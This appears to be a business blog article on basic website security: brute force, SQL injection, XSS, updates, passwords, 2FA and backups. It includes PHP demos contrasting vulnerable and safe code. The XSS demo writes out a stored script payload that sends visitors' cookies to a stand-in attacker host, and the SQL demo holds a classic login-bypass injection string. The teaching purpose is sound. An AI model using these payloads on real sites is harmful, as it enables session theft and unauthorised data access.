
Website security basics every business owner should know

You don't need to be a security expert to protect your website. But you do need to understand the basics.

If your website handles customer data, even just a contact form, security is your responsibility. Not your developer's, not your hosting provider's. Yours. They can help you implement it, but the buck stops with the business.

That sounds harsh, but it's the reality of running a website in 2021. Data breaches make the news regularly, and the ICO (the UK's data protection regulator) doesn't care that you didn't know your WordPress site hadn't been updated in two years.

The most common attacks, in my experience

Brute force login attempts are the most frequent. Bots try thousands of username/password combinations against your login page. If your admin password is "admin123" or "password" (and you'd be appalled how often it is), they'll get in within minutes.

SQL injection is when an attacker submits specially crafted input, for example a single quote followed by SQL of their own, through a form field or URL parameter on your site. If the site pastes that input straight into a database query, the attacker's text becomes part of the query and can read, change or delete data it was never meant to touch. A well-built site prevents this by keeping the query text fixed and passing user input separately (prepared, or parameterised, queries), but plenty of sites, especially older WordPress sites with outdated plugins, are still vulnerable.
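To make that concrete, here is the same user lookup written the vulnerable way and the safe way. This is an added example, not code from the article or from WordPress; it runs against a throwaway in-memory SQLite database so it needs nothing but PHP with the pdo_sqlite extension, and the table, the user row and the attacker's input are all constructed for the illustration.

```php
<?php
// Added example: vulnerable vs. prepared database lookup.
// The table, the single user and the attacker payload are constructed for this demo.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT)');

// Passwords are stored hashed; even the seed row uses a prepared statement.
$ins = $db->prepare('INSERT INTO users (login, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

// VULNERABLE: the user-supplied login is pasted into the SQL text, so whatever
// the visitor typed becomes part of the query the database executes.
function findUserVulnerable(PDO $db, string $login): ?array
{
    $sql = "SELECT id, login, pass_hash FROM users WHERE login = '$login'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// SAFE: the SQL text is fixed and the login travels separately as a bound
// parameter, so it can only ever be compared as a value, never run as SQL.
// In WordPress the equivalent is $wpdb->prepare(), e.g.
//   $wpdb->get_row( $wpdb->prepare( "SELECT * FROM {$wpdb->users} WHERE user_login = %s", $login ) );
function findUserSafe(PDO $db, string $login): ?array
{
    $stmt = $db->prepare('SELECT id, login, pass_hash FROM users WHERE login = ?');
    $stmt->execute([$login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// A login check built on the safe lookup. The password is verified in PHP
// against the stored hash, never compared inside the SQL.
function login(PDO $db, string $login, string $password): bool
{
    $user = findUserSafe($db, $login);
    return $user !== null && password_verify($password, $user['pass_hash']);
}

// Classic payload: the quote closes the string literal and "OR '1'='1'" makes
// the WHERE clause true for every row, so the first row (admin) comes back.
$payload = "x' OR '1'='1";

printf("vulnerable lookup with payload: %s\n",
    findUserVulnerable($db, $payload) ? 'returned the admin row without knowing the login' : 'no row');
printf("prepared lookup with payload:   %s\n",
    findUserSafe($db, $payload) ? 'returned a row' : 'no row (the payload is just an odd username)');
printf("login admin / wrong password:   %s\n", login($db, 'admin', 'wrong') ? 'accepted' : 'rejected');
printf("login admin / right password:   %s\n", login($db, 'admin', 'correct horse battery staple') ? 'accepted' : 'rejected');
```

Run it with `php sqli-demo.php` (any filename will do). The vulnerable lookup hands back the admin row for a login nobody has, the prepared one finds nothing, and the password check only passes with the real password. Escaping quotes by hand is not a substitute for prepared statements: it is easy to miss a field, and the database, not your string handling, should be the thing deciding where the value ends.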

Cross-site scripting (XSS) is when an attacker gets malicious JavaScript into a page on your site, typically through a comment, profile field or URL parameter that the site displays without escaping it, and that script then runs in your visitors' browsers as if it were part of your site. It can steal login cookies (unless they are flagged HttpOnly, and even then the script can act as the logged-in user from inside the page), redirect users to a scam site, or deface your pages.
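The fix is output escaping: every piece of user-supplied text is converted to harmless entities before it goes into the HTML. The following is an added example, not the article's or WordPress's own code; the comment text and the attacker's payload are constructed, the domain is a placeholder, and the helper name `h()` is this example's own.

```php
<?php
// Added example: rendering a user comment without and with output escaping.
// The comment, author name and payload below are constructed for the demo.

// One escaping helper for text between tags and inside double-quoted attributes.
// ENT_QUOTES converts both quote characters, so it is safe in attribute values too.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// A stored-XSS payload of the kind an attacker leaves in a comment: if this
// lands in the page unescaped, every visitor's browser sends their cookies
// to the attacker's server (attacker.example is a placeholder domain).
$comment = "Nice post! <script>location='https://attacker.example/?c='+document.cookie</script>";

// A second payload aimed at an attribute: it closes the quoted value and adds
// an event handler, so escaping only angle brackets would not have been enough.
$author = '" onmouseover="alert(document.cookie)';

// VULNERABLE rendering: the browser sees a real <script> element and a real
// onmouseover attribute and executes both.
function renderVulnerable(string $author, string $comment): string
{
    return "<li data-author=\"$author\">$comment</li>";
}

// SAFE rendering: < > " ' & become entities, so the browser displays the text
// literally. WordPress ships the same idea as esc_html() for text nodes and
// esc_attr() for attribute values; use them in every theme and plugin template.
function renderSafe(string $author, string $comment): string
{
    return '<li data-author="' . h($author) . '">' . h($comment) . '</li>';
}

echo "Unescaped:\n", renderVulnerable($author, $comment), "\n\n";
echo "Escaped:\n", renderSafe($author, $comment), "\n";
```

Both outputs are the literal HTML a visitor's browser would receive; paste each into a file and open it to see the difference, or simply look for the `<script>` tag in the first and `&lt;script&gt;` in the second. The rule to take away is that escaping happens at the point of output, for the context the value lands in (text, attribute, URL or JavaScript), not once on the way into the database.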

Outdated software is, in my experience, the most common vulnerability of all. WordPress core, plugins, themes, PHP itself, your server's operating system: every piece of software has bugs, and bugs get discovered and patched regularly. Once a patch is public, attackers know exactly what it fixes and scan for sites that haven't applied it. If you're not applying those patches, you're leaving known vulnerabilities open.

The basics that protect you

Keep everything updated. WordPress core, every plugin, every theme, PHP, and your server's OS. Set up automatic updates where you can, and check manually at least monthly for everything else. This single habit prevents the majority of attacks.

Use strong, unique passwords. Every account (WordPress admin, hosting panel, FTP, database) should have a unique password of at least 16 characters. Use a password manager like 1Password or Bitwarden. Never reuse passwords across services; a breach at one site is the first place attackers go for passwords to try on yours. Where your host offers SFTP, use it instead of plain FTP, which sends your password across the internet unencrypted.

Enable two-factor authentication on every admin account. Even if someone gets your password, they still need the second factor to log in. For WordPress, the Wordfence or WP 2FA plugins handle this well.

Install a TLS certificate (still widely called an SSL certificate). Your site should load over HTTPS, full stop, and HTTP requests should redirect to HTTPS so nobody lands on the unencrypted version. Let's Encrypt provides free certificates, and most decent hosts will set this up automatically. If your site still loads over HTTP, fix it today.

Limit login attempts. The default WordPress login page allows unlimited attempts, which is what makes brute forcing practical. A plugin like Limit Login Attempts Reloaded or the login protection built into Wordfence will temporarily block an IP address after a set number of failed attempts.
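This is the logic those plugins implement, whether against the brute force bots described earlier or an attacker guessing by hand. The code below is an added example written for this article and is not how any particular plugin works internally: the thresholds are assumptions (five failures in fifteen minutes, then thirty minutes locked out), the state lives in memory rather than the database, and the sequence of login attempts is constructed to exercise the edge cases.

```php
<?php
// Added example: per-IP login throttling. Thresholds are assumptions; a real
// plugin persists this state in the database so it survives across requests.

final class LoginThrottle
{
    /** @var array<string, int[]> ip => timestamps of recent failures */
    private array $failures = [];
    /** @var array<string, int> ip => unix time at which the lockout ends */
    private array $lockedUntil = [];

    public function __construct(
        private int $maxFailures = 5,
        private int $windowSeconds = 900,    // failures are counted over 15 minutes
        private int $lockoutSeconds = 1800   // then the IP is locked out for 30 minutes
    ) {
    }

    // Check this BEFORE verifying the password; a locked-out IP gets no answer
    // about whether the credentials were right.
    public function isLocked(string $ip, int $now): bool
    {
        return ($this->lockedUntil[$ip] ?? 0) > $now;
    }

    // Call after every attempt that was actually checked. Returns true when
    // this failure tipped the IP into a lockout.
    public function record(string $ip, bool $succeeded, int $now): bool
    {
        if ($succeeded) {
            unset($this->failures[$ip]);     // a genuine login clears the counter
            return false;
        }
        // Keep only failures still inside the window, then add this one.
        $recent = array_filter(
            $this->failures[$ip] ?? [],
            fn (int $t): bool => $t > $now - $this->windowSeconds
        );
        $recent[] = $now;
        $this->failures[$ip] = array_values($recent);

        if (count($recent) >= $this->maxFailures) {
            $this->lockedUntil[$ip] = $now + $this->lockoutSeconds;
            unset($this->failures[$ip]);     // the lockout itself is the penalty; start fresh afterwards
            return true;
        }
        return false;
    }
}

$throttle = new LoginThrottle(maxFailures: 5, windowSeconds: 900, lockoutSeconds: 1800);
$t0 = 1622541600;   // constructed base timestamp (1 June 2021, 10:00 UTC)

// Constructed attempt log: [seconds after $t0, client IP, password was correct].
// 203.0.113.7 is a bot hammering the login; 198.51.100.4 is a real person.
$attempts = [
    [0,    '203.0.113.7',  false],
    [1,    '203.0.113.7',  false],
    [2,    '203.0.113.7',  false],
    [3,    '203.0.113.7',  false],
    [4,    '203.0.113.7',  false],   // fifth failure inside the window triggers the lockout
    [5,    '203.0.113.7',  true],    // even the right password is refused while locked out
    [10,   '198.51.100.4', false],   // the real person mistypes once
    [20,   '198.51.100.4', true],    // then logs in, which resets their counter
    [1900, '203.0.113.7',  false],   // lockout has expired; this counts as a fresh first failure
];

foreach ($attempts as [$offset, $ip, $ok]) {
    $now = $t0 + $offset;
    if ($throttle->isLocked($ip, $now)) {
        printf("%5ds  %-13s  refused: locked out\n", $offset, $ip);
        continue;                         // do not even check the password
    }
    $locked = $throttle->record($ip, $ok, $now);
    printf("%5ds  %-13s  %s%s\n", $offset, $ip, $ok ? 'success' : 'failure', $locked ? '  -> locked out' : '');
}
```

Two caveats a practitioner would add. Per-IP blocking is blunt: a botnet spreads its guesses across thousands of addresses and never trips the threshold, while an office behind one shared address can have everyone locked out by one colleague's typos. It raises the cost of an attack, but it is the strong passwords and two-factor authentication above that actually stop it.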

Use a firewall. Cloudflare's free plan provides a basic web application firewall that blocks a lot of malicious traffic before it reaches your server. Wordfence adds an application-level firewall for WordPress specifically.

Backups are your safety net

No security measure is 100% effective. Backups are what save you when something gets through. You need automated daily backups stored somewhere separate from your website, not on the same server, and you need to keep more than one generation, because a backup taken after a break-in quietly overwriting your last clean copy is no backup at all. Test your backups periodically by actually restoring one. A backup you can't restore is worthless.

For WordPress, I use WP Umbrella which handles automated backups, uptime monitoring, and gives you a single dashboard for managing multiple sites. UpdraftPlus is a good free alternative for single sites.

When to get professional help

If you've been hacked, don't try to fix it yourself. A professional can identify how the attacker got in, clean up properly (malware often hides in multiple places, including files that look legitimate and rows in the database), and close the vulnerability. Part of a proper clean-up is changing every password and key the attacker could have seen: admin accounts, hosting panel, FTP or SFTP, the database, and any API keys in your configuration files. If you just clean up the obvious damage without finding the entry point, the attacker simply comes back through the same door, often within days.

If you're not sure whether your site is secure or want someone to take a look, reach out at [email protected].

Chris Ryan

Managing Director

17+ years in full-stack web development, most of it leading teams agency-side across e-commerce, CMS platforms, and bespoke applications. Specialises in infrastructure, system integration, and data privacy, with hands-on experience as a Data Protection Officer. Founded Innatus Digital in 2020 to offer the kind of honest, technically-led partnership that he felt was missing from the agency world.